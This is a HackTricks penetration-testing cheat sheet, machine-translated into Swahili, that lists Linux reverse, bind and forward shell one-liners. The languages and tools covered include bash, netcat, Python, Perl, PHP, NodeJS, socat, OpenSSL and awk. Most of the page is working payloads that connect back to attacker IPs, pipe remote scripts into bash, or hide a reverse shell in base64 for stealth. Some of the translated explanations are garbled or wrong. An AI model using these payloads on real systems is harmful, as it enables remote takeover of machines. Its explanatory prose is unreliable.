hacktricks/generic-methodologies-and-resources/shells/linux.md

18 KiB

Mabakuli - Linux

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalamu wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}


Ikiwa una maswali kuhusu mabakuli haya unaweza kuyachunguza kwa https://explainshell.com/

TTY Kamili

Maranyingi unapopata bakuli la kurudi soma ukurasa huu ili upate TTY kamili.

Bash | sh

curl https://reverse-shell.sh/1.1.1.1:3000 | bash
bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1
bash -i >& /dev/udp/127.0.0.1/4242 0>&1 #UDP
0<&196;exec 196<>/dev/tcp/<ATTACKER-IP>/<PORT>; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/<ATTACKER-IP>/<PORT>; while read line 0<&5; do $line 2>&5 >&5; done

#Short and bypass (credits to Dikline)
(sh)0>/dev/tcp/10.10.10.10/9091
#after getting the previous shell to get the output to execute
exec >&0

Usisahau kuangalia na mabaka mengine: sh, ash, bsh, csh, ksh, zsh, pdksh, tcsh, na bash.

Baka Salama ya Alama

#If you need a more stable connection do:
bash -c 'bash -i >& /dev/tcp/<ATTACKER-IP>/<PORT> 0>&1'

#Stealthier method
#B64 encode the shell like: echo "bash -c 'bash -i >& /dev/tcp/10.8.4.185/4444 0>&1'" | base64 -w0
echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null

Maelezo ya Shell

  1. bash -i: Sehemu hii ya amri inaanza kiendeshaji cha Bash cha mwingiliano (-i).
  2. >&: Sehemu hii ya amri ni maelezo ya mkato kwa kupelekeza pato la kawaida (stdout) na makosa ya kawaida (stderr) kwa mahali sawa.
  3. /dev/tcp/<ATTACKER-IP>/<PORT>: Hii ni faili maalum inayowakilisha unganisho la TCP kwa anwani ya IP iliyotajwa na bandari.
  • Kwa kupelekeza mito ya pato na makosa kwa faili hii, amri inatuma kimsingi pato la kikao cha kiendeshaji cha mwingiliano kwenye mashine ya mshambuliaji.
  1. 0>&1: Sehemu hii ya amri inapelekeza kuingia kawaida (stdin) kwa marudio sawa na pato la kawaida (stdout).

Unda kwenye faili na tekeleza

echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh

Shell ya Mbele

Wakati unashughulika na udhaifu wa Remote Code Execution (RCE) ndani ya programu ya wavuti inayotumia Linux, kufanikisha shell ya nyuma kunaweza kuzuiliwa na ulinzi wa mtandao kama sheria za iptables au mifumo ya kuchuja pakiti yenye utata. Katika mazingira hayo yaliyozuiwa, njia mbadala inahusisha kuanzisha shell ya PTY (Pseudo Terminal) ili kuingiliana na mfumo uliokumbwa na shida kwa ufanisi zaidi.

Zana iliyopendekezwa kwa kusudi hili ni toboggan, ambayo inasaidia kuingiliana na mazingira lengwa.

Kutumia toboggan kwa ufanisi, tengeneza moduli ya Python iliyobinafsishwa kwa muktadha wa RCE wa mfumo wako lengwa. Kwa mfano, moduli iliyoitwa nix.py inaweza kuwa na muundo ufuatao:

import jwt
import httpx

def execute(command: str, timeout: float = None) -> str:
# Generate JWT Token embedding the command, using space-to-${IFS} substitution for command execution
token = jwt.encode(
{"cmd": command.replace(" ", "${IFS}")}, "!rLsQaHs#*&L7%F24zEUnWZ8AeMu7^", algorithm="HS256"
)

response = httpx.get(
url="https://vulnerable.io:3200",
headers={"Authorization": f"Bearer {token}"},
timeout=timeout,
# ||BURP||
verify=False,
)

# Check if the request was successful
response.raise_for_status()

return response.text

Na kisha, unaweza kukimbia:

toboggan -m nix.py -i

Kutumia kabisa ganda la kuingiliana moja kwa moja. Unaweza kuongeza -b kwa ushirikiano wa Burpsuite na kuondoa -i kwa ganda la rce la msingi zaidi.

Njia nyingine ni kutumia utekelezaji wa ganda la mbele la IppSec https://github.com/IppSec/forward-shell.

Unahitaji kubadilisha tu:

  • URL ya mwenyeji mwenye kasoro
  • Kiambishi na kielezo cha mzigo wako (ikiwa ipo)
  • Namna mzigo unavyotumwa (vichwa? data? habari ziada?)

Kisha, unaweza tu kutuma amri au hata kutumia amri ya upgrade kupata PTY kamili (kumbuka kuwa mabomba hufanyiwa kusoma na kuandika kwa kuchelewa kwa takriban sekunde 1.3).

Netcat

nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp/f
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

gsocket

Angalia kwenye https://www.gsocket.io/deploy/

bash -c "$(curl -fsSL gsocket.io/x)"

Telnet

Telnet ni itifaki ya mtandao inayotumiwa kwa mawasiliano kwenye mtandao. Inaweza kutumika kwa kuingia kwa mbali kwenye mfumo wa kompyuta au kifaa kingine kwa kutumia barua pepe.

telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe

Whois

Mshambuliaji

while true; do nc -l <port>; done

Kutuma amri andika chini, bonyeza 'enter' na bonyeza CTRL+D (kusimamisha STDIN)

Mnajisi

export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done

Python

#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Perl

Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kama shellcode kwenye mifumo ya Linux. Inaweza kutumika kwa kuchora sockets, kusoma na kuandika faili, na kufanya shughuli zingine za mfumo. Perl inaweza kuwa chaguo nzuri kwa kuandika shellcode kwa sababu ya uwezo wake wa kufanya kazi na strings na pointers kwa urahisi.

perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP

PHP ni lugha ya programu inayotumika sana kwa maendeleo ya wavuti. Inaweza kutumika kwa kujenga programu za seva zinazoweza kutekeleza amri za mfumo wa uendeshaji. Kwa kawaida, PHP inaweza kutekeleza amri za mfumo wa uendeshaji kwa kutumia shell_exec, exec, system, passthru, popen, proc_open, pcntl_exec, backticks, na shell functions. Kwa hivyo, PHP inaweza kutumika kama sehemu ya mnyororo wa shambulio la kuingilia kati kwa kutekeleza amri za mfumo wa uendeshaji.

// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

// Using 'proc_open' makes no assumptions about what the file descriptor will be.
// See https://security.stackexchange.com/a/198944 for more information
<?php $sock=fsockopen("10.0.0.1",1234);$proc=proc_open("/bin/sh -i",array(0=>$sock, 1=>$sock, 2=>$sock), $pipes); ?>

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Ncat

victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl

Golang

Golang ni lugha ya programu iliyoundwa na Google. Inajulikana kwa ufanisi wake na urahisi wa matumizi.

echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

Lua

Lua

#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

NodeJS

(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();


or

require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]')
require('child_process').exec("bash -c 'bash -i >& /dev/tcp/10.10.14.2/6767 0>&1'")

or

-var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash')

or

// If you get to the constructor of a function you can define and execute another function inside a string
"".sub.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()
"".__proto__.constructor.constructor("console.log(global.process.mainModule.constructor._load(\"child_process\").execSync(\"id\").toString())")()


or

// Abuse this syntax to get a reverse shell
var fs = this.process.binding('fs');
var fs = process.binding('fs');

or

https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py

OpenSSL

Mshambuliaji (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response

Mzigo

Kwa kawaida, unataka kudumisha upatikanaji wa shell kwenye mfumo wa kompyuta ya mwathiriwa. Kwa kufanya hivyo, unaweza kutekeleza hatua zaidi za mashambulizi. Kuna njia kadhaa za kupata shell kwenye mfumo wa mwathiriwa, ikiwa ni pamoja na:

  • Reverse Shells: Hizi ni aina za shell ambazo zinawezesha kompyuta ya mwathiriwa kuungana na kompyuta yako, badala ya kinyume chake.
  • Web Shells: Hizi ni programu ndogo zilizowekwa kwenye seva ya wavuti ambazo zinaweza kutumiwa kudhibiti mfumo wa kompyuta ya mwathiriwa kupitia kivinjari cha wavuti.
  • Local Shells: Hizi ni aina za shell ambazo zinapatikana moja kwa moja kwenye kompyuta ya mwathiriwa, mara nyingi kupitia udhibiti wa mbali.

Kila aina ya shell ina faida zake na inaweza kutumiwa kulingana na mazingira na malengo ya mashambulizi yako.

#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Socat

https://github.com/andrew-d/static-binaries

Bind shell

Socat

https://github.com/andrew-d/static-binaries

Bind shell

victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337

Reverse shell

Kitanzi cha Nyuma

attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

Awk

awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Kidole

Mshambuliaji

while true; do nc -l 79; done

Kutuma amri andika chini, bonyeza 'enter' na bonyeza CTRL+D (kukomesha STDIN)

Mnajisi

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null')`; sleep 1; done

export X=Connected; while true; do X=`eval $(finger "$X"@<IP> 2> /dev/null | grep '!'|sed 's/^!//')`; sleep 1; done

Gawk

Gawk ni programu ya kutumia lugha ya Awk. Inaweza kutumika kama sehemu ya mnyororo wa zana za kufanya uchambuzi wa data kwenye mifumo ya Unix. Gawk inaweza kutumika kwa urahisi kwenye mstari wa amri kusaidia katika kuchuja, kuchambua, na kuchakata data kwa njia ya kiotomatiki.

#!/usr/bin/gawk -f

BEGIN {
Port    =       8080
Prompt  =       "bkd> "

Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}

Xterm

Hii itajaribu kuunganisha kwenye mfumo wako kwenye bandari 6001:

xterm -display 10.0.0.1:1

Kupata reverse shell unaweza kutumia (ambayo itasikiliza kwenye bandari 6001):

# Authorize host
xhost +targetip
# Listen
Xnest :1

Groovy

na frohoff TAARIFA: Java reverse shell pia inafanya kazi kwa Groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Marejeo

Kikundi cha Usalama cha Try Hard

{% embed url="https://discord.gg/tryhardsecurity" %}

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks: